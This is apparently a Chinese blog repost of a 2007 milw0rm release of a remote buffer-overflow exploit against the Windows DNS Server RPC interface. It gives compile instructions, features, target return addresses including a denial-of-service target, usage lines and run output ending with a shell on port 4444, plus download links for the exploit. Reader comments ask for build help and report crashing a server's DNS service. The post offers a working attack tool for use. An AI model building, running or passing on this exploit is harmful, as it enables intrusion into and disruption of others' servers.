MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2
鬼仔注:V2
看到有朋友留言说不知道怎么编译,这里说下用VC里用Makefile文件编译的方法:
运行cmd.exe
进到vc/bin目录
运行vc-vars32.bat
进到makefile所在的目录
nmake /f makefile
来源:milw0rm
Exploit v2 features:
– Target Remote port 445 (by default but requires auth)
– Manual target for dynamic tcp port (without auth)
– Automatic search for dynamic dns rpc port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 server and Windows 2003 server (Spanish) supported by default
– Fixed bug with Windows 2003 Shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
– Microsoft RPC api used ( who cares? :p )
D:\Programaci?3n\DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service
D:\Programaci?3n\DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
also available at
http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip
# milw0rm.com [2007-04-18]
怎么把这个弄成v.exe?
很容易的, midl一下,然后nmake一下就ok了,
鬼仔最近可好?
我把方法写到文章中了。
to enterbd:还可以,老样子了
:cry: vs8下 没编译出来
谢 :lol:
VS8?
用中文版2003测试,出现如下提示
E:\>dnstest -h 192.168.1.109
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–
[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:192.168.1.109
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.109[1047]
[+] Dynamic DNS rpc port found (1047)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.10
9[1047]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/
而且服务器DNS服务失败,53端口关闭,这是怎么回事呢,请教
溢出成功,但是连接失败